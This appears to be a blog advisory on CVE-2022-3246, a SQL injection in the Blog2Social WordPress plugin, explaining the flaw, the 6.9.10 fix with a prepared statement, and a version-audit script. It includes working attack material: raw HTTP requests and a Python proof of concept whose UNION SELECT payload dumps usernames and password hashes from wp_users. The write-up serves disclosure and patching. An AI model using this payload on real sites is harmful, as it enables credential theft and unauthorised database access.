CVE-2022-3246 is a serious vulnerability found in the popular Blog2Social: Social Media Auto Post & Scheduler WordPress plugin, versions before 6.9.10. This critical issue lets *any* logged-in user, even the lowest-level “subscriber”, run harmful SQL on your WordPress site.
In this post, we’ll break down what went wrong, how the bug can be exploited (with real examples), and how to protect yourself. Everything is written simply and clearly, so you can learn to defend your sites – or patch the problem, fast.
What Is Blog2Social?
Blog2Social is a WordPress plugin with over 80,000 active installs. It helps website owners and businesses schedule, automatically post, and cross-promote their content across various social media platforms like Facebook, Twitter, and LinkedIn.
Because it handles so much content and user activity, mistakes in security can have widespread consequences.
CVE-2022-3246 is a SQL injection vulnerability. In simpler terms, this means:
- The plugin fails to clean up (“sanitize”) user data before using it directly in a database query.
- An attacker who controls that data can therefore add their own SQL to the query, letting them view, extract, change, or even destroy data stored in the WordPress database.
Risk Level: Very high – even the lowest-privileged users can potentially use this to escalate their privileges or dump sensitive data!
Where’s the Bug?
The vulnerability lives in the Blog2Social plugin code, before version 6.9.10. Specifically, it doesn’t *properly sanitize and escape* a POST parameter before tossing it unfiltered into an SQL statement.
An example WordPress AJAX hook using this kind of vulnerable code looks like this:

```php
// Vulnerable: the raw POST value is concatenated straight into the SQL string
$prepare_query = "SELECT * FROM {$wpdb->prefix}b2s_posts WHERE id = " . $_POST['postId'];
$results = $wpdb->get_results($prepare_query);
```
Here $_POST['postId'], which any authenticated user can control, is dropped straight into the query with no checks, so a SQL injection payload can be submitted in its place.
Real-World Exploit Example
Suppose the vulnerable AJAX endpoint is /wp-admin/admin-ajax.php?action=b2s_get_post.
A legitimate request might look like this:

```http
POST /wp-admin/admin-ajax.php?action=b2s_get_post
Cookie: wordpress_logged_in_...
Content-Type: application/x-www-form-urlencoded

postId=1
```

An attacker could send this instead:

```http
POST /wp-admin/admin-ajax.php?action=b2s_get_post
Cookie: wordpress_logged_in_...
Content-Type: application/x-www-form-urlencoded

postId=1 UNION SELECT user_login, user_pass FROM wp_users--
```
This tricks the plugin into dumping usernames and password hashes from the wp_users table!
Python Proof of Concept (PoC)
Here’s a basic Python exploit you can use to test for (NOT abuse) the vulnerability on your own site:
```python
import requests

# Point this at a site you own or administer, and use a cookie from a
# logged-in session on that site (even a "subscriber" account is enough).
url = 'https://TARGETSITE.com/wp-admin/admin-ajax.php'
cookies = {'wordpress_logged_in_xxxxx': 'user auth cookie here'}
data = {
    'action': 'b2s_get_post',
    'postId': "1 UNION SELECT user_login, user_pass FROM wp_users-- "
}
r = requests.post(url, data=data, cookies=cookies)
print(r.text)
```
> Replace TARGETSITE.com and the cookie value with your info and test on your own property!
Update Immediately!
Blog2Social fixed this in 6.9.10, so upgrade as soon as possible from your WordPress plugins panel. The fix routes the parameter through $wpdb->prepare(), which binds it as an integer instead of concatenating it into the query:

```php
// Fixed: the %d placeholder forces postId to an integer before it reaches the SQL
$results = $wpdb->get_results(
    $wpdb->prepare("SELECT * FROM {$wpdb->prefix}b2s_posts WHERE id = %d", $_POST['postId'])
);
```
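To see why the %d placeholder closes the hole, here is an added Python example (it is not code from this post or from the Blog2Social plugin) that runs the post's UNION payload against a constructed in-memory SQLite stand-in for the wp_b2s_posts and wp_users tables: first with string concatenation as in the pre-6.9.10 code, then with intval-style coercion plus parameter binding, which is what $wpdb->prepare() does for %d, and finally with a stricter variant that rejects non-numeric input outright. The table layouts, rows and hash value are constructed; the real b2s_posts table has more columns than the two used here.

```python
import re
import sqlite3


def build_db():
    """Constructed in-memory stand-in for the two tables the post mentions.
    The real wp_b2s_posts has more columns; two are used here only so the
    post's UNION payload lines up (a UNION needs matching column counts)."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE wp_b2s_posts (id INTEGER, post_title TEXT);
        INSERT INTO wp_b2s_posts VALUES (1, 'Hello world');
        INSERT INTO wp_b2s_posts VALUES (2, 'Second post');
        CREATE TABLE wp_users (user_login TEXT, user_pass TEXT);
        INSERT INTO wp_users VALUES ('admin', 'constructed-phpass-hash');
        """
    )
    return con


def vulnerable_lookup(con, post_id):
    """Pre-6.9.10 pattern: the raw POST value is concatenated into the SQL."""
    query = "SELECT * FROM wp_b2s_posts WHERE id = " + post_id
    return con.execute(query).fetchall()


def php_intval(value):
    """Approximates PHP intval() on a string, which is the coercion a %d
    placeholder applies: leading digits are kept, anything else becomes 0."""
    match = re.match(r"\s*[-+]?\d+", value)
    return int(match.group()) if match else 0


def fixed_lookup(con, post_id):
    """Post-fix pattern: coerce to int and bind as a parameter, never as SQL text."""
    query = "SELECT * FROM wp_b2s_posts WHERE id = ?"
    return con.execute(query, (php_intval(post_id),)).fetchall()


def strict_lookup(con, post_id):
    """Stricter variant: reject anything that is not a plain positive integer
    instead of silently coercing it. Returning None lets the caller answer
    with a 400 and log the request, which is a useful detection signal."""
    if not re.fullmatch(r"\d+", post_id.strip()):
        return None
    query = "SELECT * FROM wp_b2s_posts WHERE id = ?"
    return con.execute(query, (int(post_id),)).fetchall()


if __name__ == "__main__":
    db = build_db()
    payload = "1 UNION SELECT user_login, user_pass FROM wp_users-- "
    print("concatenated:", vulnerable_lookup(db, payload))  # leaks the wp_users row
    print("prepared:    ", fixed_lookup(db, payload))       # only post id 1
    print("strict:      ", strict_lookup(db, payload))      # None -> reject request
```

With concatenation the UNION half of the payload runs and the wp_users row comes back alongside post 1; with binding the whole string is reduced to the integer 1 and only that post is returned. The strict variant is worth preferring in new code because a non-numeric postId on this endpoint has no legitimate source and is exactly the kind of request you want logged.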
Review User Permissions
Limit the roles that can use powerful plugin functions. Even “subscriber” level shouldn’t need access to sensitive data.
References
- WordPress Plugin Vulnerabilities: Blog2Social
- NVD Entry: CVE-2022-3246
- Blog2Social ChangeLog & Updates
- What is SQL Injection?
Final Thoughts
CVE-2022-3246 reminds us: even trusted plugins can have dangerous bugs! If you’re using Blog2Social, make sure you’re on at least version 6.9.10. Always keep plugins updated, and, if you can code, make sure user input is never passed unchecked to your database.
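A quick way to check whether an install is still on a vulnerable release, as an added Python example that is not from this post or from the plugin: it reads the Version: line from the plugin's main-file header and compares it numerically, because comparing version strings as text wrongly ranks 6.9.9 above 6.9.10. The blog2social/blog2social.php path and the plugins directory are assumptions about the standard WordPress layout, and the sample header is constructed.

```python
import os
import re

FIXED_VERSION = "6.9.10"  # first release that closes CVE-2022-3246, per the post

# Assumed: the plugin's main file follows the usual WordPress layout
# wp-content/plugins/<slug>/<slug>.php with a "Version:" header comment.
PLUGIN_MAIN_FILE = os.path.join("blog2social", "blog2social.php")


def parse_version(version):
    """Split '6.9.10' into (6, 9, 10) so comparisons are numeric.
    Plain string comparison gets this wrong: '6.9.9' > '6.9.10' as text."""
    parts = []
    for piece in version.strip().split("."):
        digits = re.match(r"\d+", piece)
        parts.append(int(digits.group()) if digits else 0)
    return tuple(parts)


def is_vulnerable(version):
    """True when the installed version is older than the fixed release."""
    return parse_version(version) < parse_version(FIXED_VERSION)


def version_from_header(header_text):
    """Pull the 'Version:' value out of a WordPress plugin header block."""
    match = re.search(r"^\s*\*?\s*Version:\s*([\w.\-]+)", header_text, re.MULTILINE)
    return match.group(1) if match else None


def audit_plugins_dir(plugins_dir):
    """Return (installed_version, vulnerable) for Blog2Social under plugins_dir,
    or (None, False) if the plugin is not installed there."""
    path = os.path.join(plugins_dir, PLUGIN_MAIN_FILE)
    if not os.path.isfile(path):
        return None, False
    with open(path, encoding="utf-8", errors="replace") as fh:
        header = fh.read(8192)  # the header sits at the top; no need to read the whole file
    version = version_from_header(header)
    return version, version is not None and is_vulnerable(version)


# Constructed sample header, shaped like the top comment of a plugin main file.
SAMPLE_HEADER = """<?php
/**
 * Plugin Name: Blog2Social: Social Media Auto Post & Scheduler
 * Version: 6.9.9
 */
"""

if __name__ == "__main__":
    v = version_from_header(SAMPLE_HEADER)
    print(v, "vulnerable" if is_vulnerable(v) else "patched")
    print(audit_plugins_dir("/var/www/html/wp-content/plugins"))  # assumed path
```

Run audit_plugins_dir against each site's plugins directory (or loop it over a fleet of docroots) and alert on any result where the second element is True; anything below 6.9.10 should be updated before the SQL injection can be reached by a low-privilege account.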
Questions or want sample code? [Contact us here](#) or check the references above!
Timeline
Published on: 10/25/2022 17:15:00 UTC
Last modified on: 10/27/2022 17:02:00 UTC